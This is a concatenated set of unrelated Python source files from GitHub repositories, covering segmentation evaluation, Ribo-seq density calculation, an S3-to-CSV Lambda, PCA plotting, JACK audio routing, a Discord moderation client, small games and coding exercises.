== i_part)\n tmp_pred = (mask == i_part)\n tp[i_part] += np.sum(tmp_gt & tmp_pred & valid)\n fp[i_part] += np.sum(~tmp_gt & tmp_pred & valid)\n fn[i_part] += np.sum(tmp_gt & ~tmp_pred & valid)\n\n jac = [0] * n_classes\n for i_part in range(0, n_classes):\n jac[i_part] = float(tp[i_part]) / max(float(tp[i_part] + fp[i_part] + fn[i_part]), 1e-8)\n\n # Write results\n eval_result = dict()\n eval_result['jaccards_all_categs'] = jac\n eval_result['mIoU'] = np.mean(jac)\n\n return eval_result\n\n\nclass SemsegMeter(object):\n def __init__(self, database):\n if database == 'PASCALContext':\n n_classes = 20\n cat_names = VOC_CATEGORY_NAMES\n has_bg = True\n \n elif database == 'NYUD':\n n_classes = 40\n cat_names = NYU_CATEGORY_NAMES\n has_bg = False\n \n else:\n raise NotImplementedError\n \n self.n_classes = n_classes + int(has_bg)\n self.cat_names = cat_names\n self.tp = [0] * self.n_classes\n self.fp = [0] * self.n_classes\n self.fn = [0] * self.n_classes\n\n @torch.no_grad()\n def update(self, pred, gt):\n pred = pred.squeeze()\n gt = gt.squeeze()\n valid = (gt != 255)\n \n for i_part in range(0, self.n_classes):\n tmp_gt = (gt == i_part)\n tmp_pred = (pred == i_part)\n self.tp[i_part] += torch.sum(tmp_gt & tmp_pred & valid).item()\n self.fp[i_part] += torch.sum(~tmp_gt & tmp_pred & valid).item()\n self.fn[i_part] += torch.sum(tmp_gt & ~tmp_pred & valid).item()\n\n def reset(self):\n self.tp = [0] * self.n_classes\n self.fp = [0] * self.n_classes\n self.fn = [0] * self.n_classes\n \n def get_score(self, verbose=True):\n jac = [0] * self.n_classes\n for i_part in range(self.n_classes):\n jac[i_part] = float(self.tp[i_part]) / max(float(self.tp[i_part] + self.fp[i_part] + self.fn[i_part]), 1e-8)\n\n eval_result = dict()\n eval_result['jaccards_all_categs'] = jac\n eval_result['mIoU'] = np.mean(jac)\n\n\n if verbose:\n print('\\nSemantic Segmentation mIoU: {0:.4f}\\n'.format(100 * eval_result['mIoU']))\n class_IoU = eval_result['jaccards_all_categs']\n for i in range(len(class_IoU)):\n spaces = ''\n for j in range(0, 20 - len(self.cat_names[i])):\n spaces += ' '\n print('{0:s}{1:s}{2:.4f}'.format(self.cat_names[i], spaces, 100 * class_IoU[i]))\n\n return eval_result\n\n\ndef eval_semseg_predictions(database, save_dir, overfit=False):\n \"\"\" Evaluate the segmentation maps that are stored in the save dir \"\"\"\n\n # Dataloaders\n if database == 'PASCALContext':\n from data.pascal_context import PASCALContext\n n_classes = 20\n cat_names = VOC_CATEGORY_NAMES\n has_bg = True\n gt_set = 'val'\n db = PASCALContext(split=gt_set, do_edge=False, do_human_parts=False, do_semseg=True,\n do_normals=False, overfit=overfit)\n \n elif database == 'NYUD':\n from data.nyud import NYUD_MT\n n_classes = 40\n cat_names = NYU_CATEGORY_NAMES\n has_bg = False\n gt_set = 'val'\n db = NYUD_MT(split=gt_set, do_semseg=True, overfit=overfit)\n \n else:\n raise NotImplementedError\n \n base_name = database + '_' + 'test' + '_semseg'\n fname = os.path.join(save_dir, base_name + '.json')\n\n # Eval the model\n print('Evaluate the saved images (semseg)')\n eval_results = eval_semseg(db, os.path.join(save_dir, 'semseg'), n_classes=n_classes, has_bg=has_bg)\n with open(fname, 'w') as f:\n json.dump(eval_results, f)\n \n # Print results\n class_IoU = eval_results['jaccards_all_categs']\n mIoU = eval_results['mIoU']\n\n print('\\nSemantic Segmentation mIoU: {0:.4f}\\n'.format(100 * mIoU))\n for i in range(len(class_IoU)):\n spaces = ''\n for j in range(0, 15 - len(cat_names[i])):\n spaces += ' '\n print('{0:s}{1:s}{2:.4f}'.format(cat_names[i], spaces, 100 * class_IoU[i]))\n\n return eval_results\n","repo_name":"SimonVandenhende/Multi-Task-Learning-PyTorch","sub_path":"evaluation/eval_semseg.py","file_name":"eval_semseg.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","stars":689,"dataset":"github-code","pt":"53"} +{"seq_id":"4061570452","text":"import sys \n\n\ndef usage():\n print('Usage: python script.py [sam file] [outfile_name]')\n\ndef calculate_ribosome_density_ontrans(input_file, output_file, min_value=23, max_value=35):\n # save in dict\n density_dict = {}\n total_reads = 0\n\n # open sam file\n with open(input_file, \"r\") as reader:\n for line in reader:\n record = line.strip().split(\"\\t\")\n # do something\n if record[1] == \"0\":\n total_reads += 1\n # tags\n refname = record[2]\n align_pos = int(record[3])\n read_length = len(record[9])\n \n # filter read length\n if min_value < read_length < max_value:\n end5 = align_pos\n end3 = end5 + read_length - 1\n # shift +- 11nt\n centerEnd5 = end5 + 11\n centerEnd3 = end3 - 11\n centerLength = centerEnd3 - centerEnd5 + 1\n \n # ribo density\n for elem in range(centerEnd5, centerEnd3 + 1):\n key = f\"{refname}:{elem}\"\n density_dict[key] = density_dict.get(key, 1.0 / centerLength) + 1.0 / centerLength\n else:\n continue\n \n # output file\n with open(output_file, \"w\") as outfile:\n for key in sorted(density_dict.keys()):\n refname, align_pos = key.split(\":\")\n raw_density = density_dict[key]\n \n # RPM normalization\n rpm = (raw_density/total_reads) * 1000000\n outfile.write(f\"{refname}\\t{align_pos}\\t{raw_density}\\t{rpm}\\n\")\n\n\nif __name__ == '__main__':\n try:\n calculate_ribosome_density_ontrans(input_file = sys.argv[1], output_file= sys.argv[2])\n\n except:\n usage()","repo_name":"yuanlizhanshi/NGS_Workflow","sub_path":"Ribo-seq-workflow/script/calculate_ribosome_density.py","file_name":"calculate_ribosome_density.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"33002538011","text":"import requests\nfrom bs4 import BeautifulSoup\nimport boto3\nimport datetime\nimport json\nimport csv\nimport os\n\n\ndef f():\n\n s3 = boto3.client('s3')\n dt = datetime.date.today()\n \n source_file_name = dt.strftime(\"%Y-%m-%d\")+\".html\"\n csv_file_name ='{dt}.csv'\n \n try:\n s3.download_file('casachechitox', source_file_name, source_file_name)\n \n html_doc = read_file(source_file_name)\n \n div_tag_script = BeautifulSoup.find('script', type='application/ld+json')\n json_text = div_tag_script.string.strip()\n json_file = json.loads(json_text)\n \n create_csv(csv_file_name, json_file)\n\n with open(csv_file_name, 'rb') as csvfile:\n s3.upload_fileobj(csvfile, 'casafinal', '{dt}.csv')\n\n os.remove(source_file_name)\n os.remove('/tmp/' + csv_file_name)\n\n except Exception as e:\n # Handle the exception\n print('error:{e}')\n \n \n return {\n 'statusCode': 200 \n } \n \n \n \ndef create_csv(csv_name, data):\n\n fields = [\"date\", \"@type\", \"name\", \n \"numberOfBedrooms\",\"numberOfBathroomsTotal\",\n \"address.addressRegion\", \"address.addressLocality\",\n \"address.addressCountry.name\",\"floorSize.value\",\"floorSize.unitCode\"]\n\n header_row = dict((field, field) for field in fields)\n\n with open('/tmp/' + csv_name, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=fields)\n writer.writerow(header_row)\n\n for item in data['about']:\n row = {\n \"date\":\n datetime.date.today().strftime(\"%Y-%m-%d\"),\n \"@type\":\n item.get('@type', ''),\n \"name\":\n item.get('name', ''),\n \"numberOfBedrooms\":\n item.get('numberOfBedrooms', ''),\n \"numberOfBathroomsTotal\":\n item.get('numberOfBathroomsTotal', ''),\n \"address.addressRegion\":\n item.get('address', {}).get('addressRegion', ''),\n \"address.addressLocality\":\n item.get('address', {}).get('addressLocality', ''),\n \"address.addressCountry.name\":\n item.get('address', {}).get('addressCountry', {}).get('name', ''),\n \"floorSize.value\":\n item.get('floorSize', {}).get('value', {}),\n \"floorSize.unitCode\":\n item.get('floorSize', {}).get('unitCode', {})\n }\n writer.writerow(row)\n\n\ndef read_file(source_file_name):\n\n with open(source_file_name, 'r') as f:\n html_doc = f.read()\n return html_doc\n","repo_name":"chechitox11/Parcial_BigData","sub_path":"lamnda2.py","file_name":"lamnda2.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25530471173","text":"import numpy as np\nimport seaborn as sns\nimport pandas as pd\n\nfrom gaussian import get_samples\nfrom pca import get_principal_axis\nfrom fisher import get_fisher_axis\n\n\ndef map_samples(samples, axis):\n \"\"\"Map samples based on a given axis.\n\n Args:\n samples: samples which have the shape of (n, d).\n axis: 1-dimensional vector which have the shape of (d, ).\n \"\"\"\n # map samples\n samples = np.inner(axis.T, samples)\n\n # reshape samples\n samples = np.reshape(samples, (-1, 1))\n\n return samples\n\n\ndef main():\n \"\"\"Entry point.\"\"\"\n # get samples that follow a Gaussian distribution (1)\n mean1 = (3, 1)\n var1 = ([1, 2], [2, 5])\n samples1, labels1 = get_samples(mean1, var1, dist_id=1)\n\n # get samples that follow a Gaussian distribution (2)\n mean2 = (1, 3)\n var2 = ([1, 2], [2, 5])\n samples2, labels2 = get_samples(mean2, var2, dist_id=2)\n\n # concat samples and labels respectively\n samples = np.concatenate((samples1, samples2), axis=0)\n labels = np.concatenate((labels1, labels2), axis=0)\n\n # get the 1st principal axis\n pa = get_principal_axis(samples)\n\n # get the fisher axis\n fa = get_fisher_axis(samples1, samples2)\n\n # map into 1d-plane based on `pa`\n pa_samples = map_samples(samples, pa)\n\n # map into 1d-plane based on `fa`\n fa_samples = map_samples(samples, fa)\n\n # plot samples to 2d-plane (pca)\n pa_data = np.concatenate((pa_samples, labels), axis=1)\n pa_data = pd.DataFrame(pa_data, columns=['z', 'dist_id'])\n g = sns.FacetGrid(pa_data, hue='dist_id', size=8)\n g.map(sns.plt.hist, 'z', alpha=0.8)\n\n # show a graph\n sns.plt.show()\n\n # plot samples to 2d-plane (pca)\n fa_data = np.concatenate((fa_samples, labels), axis=1)\n fa_data = pd.DataFrame(fa_data, columns=['z', 'dist_id'])\n g = sns.FacetGrid(fa_data, hue='dist_id', size=8)\n g.map(sns.plt.hist, 'z', alpha=0.8)\n\n # show a graph\n sns.plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hkiyomaru/pra","sub_path":"scripts/0510/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74797447526","text":"#!/usr/bin/env python3\nimport heapq\n\nclass Solution:\n def thirdMax(self, nums: list[int]) -> int:\n nums = list(set(nums))\n if len(nums) < 3:\n return max(nums)\n heap = []\n for i in nums:\n heapq.heappush(heap,i)\n if len(heap) > 3:\n heapq.heappop(heap)\n return heapq.heappop(heap)","repo_name":"femifacia/algorithms","sub_path":"python/algorithms/third_maximum_number/main_min_heap.py","file_name":"main_min_heap.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72412063848","text":"#!/usr/bin/env python3\nimport jack\nimport time\nclient = jack.Client('chrome_tab_linker')\n\nmix_chrome_ports = [('jack_mixer:Chrome 1 L', 'jack_mixer:Chrome 1 R'),\n ('jack_mixer:Chrome 2 L', 'jack_mixer:Chrome 2 R'),\n ('jack_mixer:Chrome 3 L', 'jack_mixer:Chrome 3 R')]\n\nfor i, p in enumerate(mix_chrome_ports):\n mix_chrome_ports[i] = (client.get_port_by_name(p[0]),\n client.get_port_by_name(p[1]))\n\ntempPort = None\n\n@client.set_port_registration_callback\ndef port_registration(port, register):\n\n if \"Google Chrome\" in port.name and register:\n\n global tempPort\n if tempPort is None:\n tempPort = port\n return\n\n for conPorts in client.get_all_connections(port):\n client.disconnect(port, conPorts)\n\n LR = 0 if port.name[-1] == 'L' else 1\n\n lessUsedPorts = min(mix_chrome_ports, key=lambda x:len(client.get_all_connections(x[0])))\n print(lessUsedPorts)\n\n if port.name[-1] == 'L':\n client.connect(port, lessUsedPorts[0])\n client.connect(tempPort, lessUsedPorts[1])\n elif port.name[-1] == 'R':\n client.connect(port, lessUsedPorts[1])\n client.connect(tempPort, lessUsedPorts[0])\n else:\n print(\"port name does not end with L or R\")\n\n tempPort = None\n\nwith client:\n while True:\n time.sleep(100)","repo_name":"8-Lambda-8/PipeWireConfigs","sub_path":"chromeTabLinker.py","file_name":"chromeTabLinker.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22308031442","text":"import dataclasses\n\nfrom naff import Guild, Member\n\nfrom ElevatorBot.networking.http import BaseBackendConnection\nfrom ElevatorBot.networking.routes import moderation_mute, moderation_warning\nfrom Shared.networkingSchemas.misc.moderation import ModerationAddModel, ModerationModel, ModerationsModel\n\n\n@dataclasses.dataclass\nclass Moderation(BaseBackendConnection):\n discord_guild: Guild\n discord_member: Member\n\n async def get_mutes(self) -> ModerationsModel:\n \"\"\"Get all mutes\"\"\"\n\n result = await self._backend_request(\n method=\"GET\",\n route=moderation_mute.format(guild_id=self.discord_guild.id, discord_id=self.discord_member.id),\n )\n\n # convert to correct pydantic model\n return ModerationsModel.parse_obj(result.result)\n\n async def add_mute(self, reason: str, duration_in_seconds: int, mod_discord_id: int) -> ModerationModel:\n \"\"\"Add a mute\"\"\"\n\n result = await self._backend_request(\n method=\"POST\",\n route=moderation_mute.format(guild_id=self.discord_guild.id, discord_id=self.discord_member.id),\n data=ModerationAddModel(\n reason=reason, duration_in_seconds=duration_in_seconds, mod_discord_id=mod_discord_id\n ),\n )\n\n # convert to correct pydantic model\n return ModerationModel.parse_obj(result.result)\n\n async def get_warnings(self) -> ModerationsModel:\n \"\"\"Get all warnings\"\"\"\n\n result = await self._backend_request(\n method=\"GET\",\n route=moderation_warning.format(guild_id=self.discord_guild.id, discord_id=self.discord_member.id),\n )\n\n # convert to correct pydantic model\n return ModerationsModel.parse_obj(result.result)\n\n async def add_warning(self, reason: str, mod_discord_id: int) -> ModerationModel:\n \"\"\"Add a warning\"\"\"\n\n result = await self._backend_request(\n method=\"POST\",\n route=moderation_warning.format(guild_id=self.discord_guild.id, discord_id=self.discord_member.id),\n data=ModerationAddModel(reason=reason, mod_discord_id=mod_discord_id),\n )\n\n # convert to correct pydantic model\n return ModerationModel.parse_obj(result.result)\n","repo_name":"TheDescend/elevatorbot","sub_path":"ElevatorBot/networking/misc/moderation.py","file_name":"moderation.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"6364081334","text":"# -*- coding: utf-8 -*-\nfrom functools import partial\n\nfrom ghrequests.requester import Dispatcher\nfrom pkg_resources import get_distribution, DistributionNotFound\nfrom .requester import Request\n\ntry:\n dist_name = __name__\n __version__ = get_distribution(dist_name).version\nexcept DistributionNotFound:\n __version__ = 'unknown'\nfinally:\n del get_distribution, DistributionNotFound\n\n__all__ = [\n 'get',\n 'post',\n 'put',\n 'head',\n 'patch',\n 'delete',\n 'request',\n 'Request'\n]\n\nget = partial(Request, 'GET')\noptions = partial(Request, 'OPTIONS')\nhead = partial(Request, 'HEAD')\npost = partial(Request, 'POST')\nput = partial(Request, 'PUT')\npatch = partial(Request, 'PATCH')\ndelete = partial(Request, 'DELETE')\nrequest = Request\n\n\ndef request_all(requests, max_connections=None, max_per_domain=None):\n \"\"\"\n Run all requests in parallel, respecting the given limits.\n\n\n :param max_connections: Global max simultaneous connections.\n :param max_per_domain: Max requests per host.\n \"\"\"\n return Dispatcher(max_connections, max_per_domain).run(requests)\n","repo_name":"pappacena/ghrequests","sub_path":"src/ghrequests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5804219701","text":"from multiprocessing.sharedctypes import Value\nimport numpy as np\nimport pandas as pd\n\nfrom modules.enums import *\nfrom modules.profile import HourProfile\nfrom modules.tradingProduct import TradingProduct \n\n\nclass Hedging:\n def __init__(self, to_hedge_profile: HourProfile):\n self.initial_hourProfile = to_hedge_profile\n self.__rename_val_col_to_mw()\n self.hedge_product_selection = []\n self.hedge_products_list = []\n self.price_curve = None\n \n def calc_quantity_hedges(self, product=Products.cal, hour=Hours.base) -> list:\n \"\"\"Calculate a quantity hedge base on the profile - product eg. 'Cal' and hours eg. 'Peak' \"\"\"\n \n # initialies a onw list entry with all the relevant timeseries for the upcoming hedge.\n self.hedge_product_selection.append(f'{product} {hour}')\n\n # calculate the average mw on base or peak and cal / q\n hedges = self.__get_averages_per_period(hour_profile=self.initial_hourProfile, product=product, hour=hour)\n \n # store hedges\n self.hedge_products_list.extend(hedges)\n\n # return the hedge table as df\n return hedges\n\n\n def calc_value_hedges(self, product=Products.cal, hour=Hours.base) -> list:\n \n # in case of value-hedging use a MW*CHF profile instead of an MW profile -> the curve has to be added before with add_price_curve method\n profile = self.initial_hourProfile.df_profile.copy()\n if not isinstance(self.price_curve, HourProfile):\n errorstr = 'No price curve found. Please add price curve first via add_price_curve_method'\n raise ValueError(errorstr)\n profile['chf'] = self.initial_hourProfile.df_profile['mw'] * self.price_curve.df_profile[self.price_curve.name_val]\n\n value_hour_profile = HourProfile(profile['chf'], name_val=Values.chf, type='value_profile')\n\n # calculate the average CHF value on base or peak and cal / q\n average_chf_values = self.__get_averages_per_period(hour_profile=value_hour_profile, product=product, hour=hour)\n\n # calculate the average price of the price curve in CHF/MWh\n average_market_prices = self.__get_averages_per_period(hour_profile=self.price_curve, product=product, hour=hour)\n\n value_hedges = []\n for idx, tp in enumerate(average_chf_values):\n # divide the average chf value of each Trading Product by the market value price of the matching market product to get the value hedge MW\n mw = tp.trading_product_divided_other(average_market_prices[idx])\n \n # create the new value hedge TradingProduct\n value_hedges.append(TradingProduct(\n type=tp.info['type'],\n start=tp.info['start'],\n end=tp.info['end'],\n mw = mw\n ))\n \n # store hedges\n self.hedge_products_list.extend(value_hedges)\n \n return value_hedges\n\n\n def combinations_of_hedge(self, base_product:Products=Products.none, peak_product:Products=Products.none, hedge_type:HedgeType=HedgeType.quantity):\n hedges_list_combinations = []\n\n # only base\n if base_product and not peak_product:\n hedges = self.__return_hedge_based_on_type(hedge_type=hedge_type, product=base_product, hour=Hours.base)\n hedges_list_combinations.extend(hedges)\n\n # only peak\n elif not base_product and peak_product:\n hedges = self.__return_hedge_based_on_type(hedge_type=hedge_type, product=peak_product, hour=Hours.peak)\n hedges_list_combinations.extend(hedges)\n\n # base and peak products\n if base_product and peak_product:\n # the base hedge is set to the off-peak quantity\n hedges_base = self.__return_hedge_based_on_type(hedge_type=hedge_type, product=base_product, hour=Hours.off_peak)\n for hedge in hedges_base:\n hedge.set_type(Hours.base) \n hedges_list_combinations.extend(hedges_base)\n\n # peak quantity calculation\n hedges_peak = self.__return_hedge_based_on_type(hedge_type=hedge_type, product=peak_product, hour=Hours.peak)\n\n for index, hedge_peak in enumerate(hedges_peak):\n # same duration of products i.e both cal or both q\n if base_product == peak_product:\n # substract base from peak hedge \n hedge_peak.set_mw(hedge_peak.trading_product_minus_other(hedges_base[index]))\n \n \n # base in cal and peak in q \n if base_product==Products.cal and peak_product==Products.q:\n # peak hedges are the calculated peak hedges minus the cal base hedge\n hedge_peak.set_mw(hedge_peak.trading_product_minus_other(hedges_base[0]))\n\n hedges_list_combinations.extend(hedges_peak)\n\n return hedges_list_combinations\n\n def initial_profile_minus_all_hedges(self) -> tuple:\n \"\"\" \n returns an tupple of HourProfile of calculated as the initial profile minus all hedges.\n first element: profile with positive and negative values\n second element: the profile with the positiv values\n third element: the negative values of the profile transformed to positiv values \n \"\"\"\n \n list_of_df = []\n for trading_product in self.hedge_products_list:\n list_of_df.append(trading_product.generateProfile().df_profile)\n concated = pd.concat(list_of_df, axis=1)\n \n if len(self.hedge_products_list) >1:\n summed_hedge_profile = concated['mw'].sum(axis=1)\n else:\n summed_hedge_profile = concated['mw']\n\n res = (self.initial_hourProfile.df_profile['mw'] - summed_hedge_profile).to_frame(name='mw')\n pos = res['mw'] > 0\n \n res['pos'] = res['mw']\n res['pos'].loc[~pos] = 0\n \n res['neg'] = res['mw']\n res['neg'].loc[pos] = 0\n res['neg'] = res['neg'].abs()\n\n return (\n HourProfile(profile=res['mw'], name_val=Values.mw, type='residual_all'),\n HourProfile(profile=res['pos'], name_val=Values.mw, type='residual_pos'),\n HourProfile(profile=res['neg'], name_val=Values.mw, type='residual_neg'),\n )\n\n def print_all_mwh_of_residual(self):\n res_profiles = self.initial_profile_minus_all_hedges()\n for pro in res_profiles:\n print(f'{pro.type} with {pro.get_sum_of_profile()} Mwh')\n\n def print_hedges(self):\n for trading_prod in self.hedge_products_list:\n print(trading_prod)\n\n def clear_previous_hedges(self):\n self.hedge_product_selection = []\n self.hedge_products_list = []\n self.hedge_timeseries_df = []\n\n def add_price_curve(self, price_curve:HourProfile):\n price_curve.trim_date_to_other_hourProfile(self.initial_hourProfile)\n self.price_curve = price_curve\n\n def to_list_of_trading_products(self, profile:pd.DataFrame, product:Products, hour:Hours):\n # profile DF gruppieren und aus den einzelnen Gruppen ein Hedge object herstellen\n temp_df_grouped = profile.groupby('hedge_group')\n \n out_list = []\n\n for name, group in temp_df_grouped:\n\n out_list.append(TradingProduct(\n type=hour, \n mw=group['average'].mean().round(2), # round to 2 digits \n start=group['start'].iloc[0].strftime('%Y-%m-%d %H:00'), \n end= group['end'].iloc[0].strftime('%Y-%m-%d %H:00')))\n return out_list\n\n def __get_averages_per_period(self, hour_profile:HourProfile, product=Products.cal, hour=Hours.base) -> list:\n \"\"\"Calculate a the average on the profile - product eg. 'Cal' and hours eg. 'Peak' \"\"\"\n\n name_val = hour_profile.name_val\n profile = hour_profile.df_profile\n\n # find base or peak or off-peak hours according to hour input\n profile = self.__hour_matcher(profile=profile, hour=hour)\n\n # grouping df into the hours and products\n grouped_by_hedge_product = self.__product_grouper(profile=profile, product=product, name_val=name_val)\n\n # adjust index to cal,q or m\n profile = self.__to_period_on_index(profile=profile, product=product)\n\n # calculate and assign every hour with the hedge product value\n profile['average'] = grouped_by_hedge_product.transform('mean')\n # write nan on the hours not included in the hedge\n profile.loc[profile['hedge_hour'] == False, ['average']] = np.NaN\n # create another column with 0 instead of nan, to better caclulate later\n profile['average_non_nan'] = profile['average'].fillna(0)\n \n # return TadingProducts - There is the rounding to two digigts\n hedges = self.to_list_of_trading_products(profile=profile, product=product, hour=hour)\n \n return hedges\n\n @staticmethod\n def __hour_matcher(profile:pd.DataFrame, hour: Hours):\n \"\"\"find the hours matching the input of hour\"\"\"\n if hour == Hours.base:\n profile['hedge_hour'] = True\n elif hour == Hours.off_peak:\n profile['hedge_hour'] = profile['is_peak'] \\\n .map({True: False, False: True})\n elif hour == Hours.peak:\n profile['hedge_hour'] = profile['is_peak']\n return profile\n\n @staticmethod\n def __product_grouper(profile:pd.DataFrame, product: Products, name_val):\n \"\"\"find the product hours matching the input and group the date accordingly\"\"\"\n if product == Products.cal:\n grouped_profile = profile.groupby(['hedge_hour', 'year'])\n elif product == Products.q:\n grouped_profile = profile.groupby(['hedge_hour', 'year', 'quarter'])\n elif product == Products.m:\n grouped_profile = profile.groupby(['hedge_hour', 'year', 'month'])\n\n return grouped_profile[name_val]\n\n @staticmethod\n def __to_period_on_index(profile:pd.DataFrame, product: Products):\n \n if product == Products.cal:\n period = profile.index.to_period('Y')\n elif product == Products.q:\n period = profile.index.to_period('Q')\n elif product == Products.m:\n period = profile.index.to_period('M')\n\n profile['hedge_group'] = period\n profile['start'] = period.to_timestamp(how='start')\n profile['end'] = period.to_timestamp(how='end')\n \n return profile\n\n @staticmethod\n def __calc_residual_profile(profile:pd.DataFrame):\n profile['residual'] = profile['mw'] - profile['average_non_nan']\n return profile\n\n def __return_hedge_based_on_type(self, hedge_type:HedgeType, product:Products, hour:Hours):\n \n \n if hedge_type == HedgeType.quantity:\n # quantity hedge\n hedges = self.calc_quantity_hedges(product=product, hour=hour)\n\n elif hedge_type == HedgeType.value:\n # value hedge\n hedges = self.calc_value_hedges(product=product, hour=hour)\n else:\n raise NotImplementedError('HedgeType not implemented')\n \n return hedges\n\n def __rename_val_col_to_mw(self):\n rename = {\n self.initial_hourProfile.name_val : 'mw'\n }\n self.initial_hourProfile.df_profile.rename(columns=rename, inplace=True)\n self.initial_hourProfile.name_val = 'mw'","repo_name":"AeDani/EnergyUtils","sub_path":"modules/hedging.py","file_name":"hedging.py","file_ext":"py","file_size_in_byte":11493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73167816488","text":"import random, sys\r\n\r\nprint('ROCK , PAPER, SCISSORS')\r\n\r\nwins = 0\r\nties = 0\r\nlosses = 0\r\n\r\n# choose what to display\r\n\r\nwhile True:\r\n print(f'{wins} wins, {losses} losses, {ties} ties')\r\n\r\n while True:\r\n print('Enter your move: (r)ock (p)aper (s)cissors or (q)uit')\r\n playerMove = input()\r\n if playerMove == 'r' or playerMove == 'p' or playerMove == 's':\r\n break\r\n elif playerMove == 'q':\r\n sys.exit()\r\n\r\n else:\r\n print('Write either \"r\" for rock \"p\" for paper\" or \"s\" for scissors- like... are u dumb')\r\n\r\n # players input\r\n\r\n if playerMove == 'r':\r\n print('ROCK versus...')\r\n elif playerMove == 'p':\r\n print('PAPER versus...')\r\n elif playerMove == 's':\r\n print('SCISSORS versus...')\r\n\r\n # computers input\r\n randomNumber = random.randint(1, 3)\r\n if randomNumber == 1:\r\n computerMove = 'r'\r\n print('ROCK')\r\n elif randomNumber == 2:\r\n computerMove = 'p'\r\n print('PAPER')\r\n elif randomNumber == 3:\r\n computerMove = 's'\r\n print('SCISSORS')\r\n\r\n # what's gonna happen aka grand finale aka wagwgowngwognsnsj\r\n\r\n if playerMove == computerMove:\r\n print('Tie')\r\n ties = ties + 1\r\n elif playerMove == 'r' and computerMove == 'p':\r\n print('You lose')\r\n losses = losses + 1\r\n elif playerMove == 'p' and computerMove == 's':\r\n print('You lose')\r\n losses = losses + 1\r\n elif playerMove == 's' and computerMove == 'r':\r\n print('You lose')\r\n losses = losses + 1\r\n elif playerMove == 'r' and computerMove == 's':\r\n print('You win')\r\n wins = wins + 1\r\n elif playerMove == 'p' and computerMove == 'r':\r\n print('You win')\r\n wins = wins + 1\r\n elif playerMove == 's' and computerMove == 'p':\r\n print('You win')\r\n wins = wins + 1\r\n\r\n else:\r\n print('Write either \"r\" for rock \"p\" for paper\" or \"s\" for scissors')\r\n\r\n","repo_name":"nanoblyat/rockpapersiccor","sub_path":"rpsgame.py","file_name":"rpsgame.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74949871848","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n##########################################################################\n#\t> File Name: 83_remove_duplicates_from_sorted_list.py\n#\t> Author: Tingjian Lau\n#\t> Mail: tjliu@mail.ustc.edu.cn\n#\t> Created Time: 2016/05/16\n#########################################################################\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def deleteDuplicates(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n p = head\n \n while p:\n if not p.next:\n break\n if p.val == p.next.val:\n p.next = p.next.next\n else:\n p = p.next\n \n return head\n","repo_name":"tingjianlau/my-leetcode","sub_path":"83_remove_duplicates_from_sorted_list/83_remove_duplicates_from_sorted_list.py","file_name":"83_remove_duplicates_from_sorted_list.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12103884970","text":"#내일 우산을 가지고 갈지 판단해봅시다.\n#조건: 비가 올까(0:온다. 1:안온다.)\n# 날이 흐린가(0:흐림. 1:안흐림.)\n# 비가 오거나, 날이 흐리면 우산을 가지고 가고, 빨리 퇴근\n# 아니면 그럼뭐할까? '야근' 이라고 치면 '야근하러 가야지'를 프린트\n\nquestion = '''\n조건: 비가 올까(0:온다. 1:안온다.)\n 날이 흐린가(0:흐림. 1:안흐림.)\n입력예: 비가오고 날이 흐린 경우=> 0 0\n'''\nrain, day = input(question).split()\nif rain == '0' or day =='0':\n print('우산을 가지고 가자')\n print('퇴근을 빨리 하자')\nelse:\n print('우산을 가지고 가지 않는다.')\n data = input('그럼 뭐하지~?')\n print(data,'하러가야지')","repo_name":"jinhuioh/home_pythorn","sub_path":"pythonProject1/oper/oper04.py","file_name":"oper04.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1733426562","text":"from geopy.geocoders import Nominatim\r\nfrom geopy import distance\r\n\r\ngeodecoder = Nominatim(user_agent=\"python\")\r\n\r\nprint(\"\"\"\r\n\tWELCOME TO AERIAL DISTANCE CALCULATOR!\r\n\"\"\")\r\n\r\nlocation1 = input(\"\\tEnter your current location : \")\r\nlocation2 = input(\"\\tEnter your destination : \")\r\n\r\ncoordinates1 = geodecoder.geocode(location1)\r\ncoordinates2 = geodecoder.geocode(location2)\r\n\r\nlat1 = coordinates1.latitude\r\nlon1 = coordinates1.longitude\r\nlat2 = coordinates2.latitude\r\nlon2 = coordinates2.longitude\r\n\r\nstarting = (lat1, lon1)\r\ndestination = (lat2, lon2)\r\n\r\ndist = distance.distance(starting, destination)\r\ndiststr = str(dist)\r\naccdist = diststr.split(\".\", 2)[0]\r\nprint(f\"\\n\\tYour aerial distance would b around {accdist} km 